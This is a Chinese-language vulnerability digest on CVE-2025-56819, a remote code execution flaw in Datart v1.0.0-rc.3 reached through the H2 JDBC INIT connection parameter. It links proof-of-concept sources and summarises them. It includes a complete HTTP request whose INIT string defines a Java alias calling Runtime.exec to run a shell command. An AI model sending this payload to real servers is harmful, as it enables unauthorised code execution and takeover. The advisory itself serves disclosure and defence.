# N/A
## 概述
Datart v.1.0.0-rc.3 存在远程代码执行漏洞,攻击者可通过 `INIT` 连接参数注入并执行任意代码。
## 影响版本
- Datart v.1.0.0-rc.3
## 细节
该漏洞存在于数据库连接功能中,`INIT` 参数用于在建立连接时执行初始化命令。在受影响版本中,系统未对 `INIT` 参数内容进行充分过滤或限制,导致攻击者在具备连接权限的前提下,可通过构造恶意的初始化语句执行任意代码。
## 影响
攻击者可利用该漏洞在目标服务器上远程执行任意代码,从而获取系统控制权或造成其他恶意影响。
是否为 Web 类漏洞: 是
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|---|---|---|
| 1 | An issue in Datart v.1.0.0-rc.3 allows a remote attacker to execute arbitrary code via the INIT connection parameter. | https://github.com/xyyzxc/CVE-2025-56819 | POC详情 |
| 2 | Datart v1.0.0-rc.3 contains a vulnerability that allows remote attackers to execute arbitrary code via INIT connection parameters. | https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-56819.yaml | POC详情 |
标题: GitHub - h2database/h2database: H2 is an embeddable RDBMS written in Java. -- 🔗来源链接
标签:
神龙速读:
从这个网页截图中,可以获取到以下关于漏洞的关键信息:
- **安全标签**:在页面顶部的导航栏中有一个“Security”标签,点击该标签可以查看与H2数据库相关的安全问题和漏洞信息。
- **Issue Tracker**:在“Support”部分提到,可以通过“Issue tracker”提交漏洞报告和功能请求。这表明项目维护者鼓励用户报告安全问题。
- **Mailing List / Forum**:同样在“Support”部分,提到了一个邮件列表或论坛,用户可以在那里讨论H2的相关问题,包括可能的安全漏洞。
这些信息表明H2数据库项目有机制来接收和处理安全相关的反馈和报告。
标题: GitHub - xyyzxc/CVE-2025-56819: An issue in Datart v.1.0.0-rc.3 allows a remote attacker to execute arbitrary code via the INIT connection parameter. -- 🔗来源链接
标签:
神龙速读:
### 关键漏洞信息
- **CVE编号**: CVE-2025-56819
- **受影响版本**: Datart v.1.0.0-rc.3
- **漏洞类型**: 远程代码执行 (RCE)
- **攻击向量**: 通过INIT连接参数执行任意代码
#### 示例请求
```http
POST /api/v1/data-provider/test HTTP/1.1
Host: test.com:8080
Content-Type: application/json
Content-Length: 520
{
"name": "jdbc-data-provider",
"type": "JDBC",
"properties": {
"dbType": "H2",
"url": "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS 'void cmd_exec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);}';EXEC('touch /tmp/hacked');",
"user": null,
"password": "",
"driverClass": "org.h2.Driver",
"serverAggregate": false,
"enableSpecialSQL": false,
"enableSyncSchemas": true,
"syncInterval": "60",
"properties": {}
}
}
```
#### 漏洞描述
Datart v.1.0.0-rc.3 存在一个问题,允许远程攻击者通过INIT连接参数执行任意代码。
暂无评论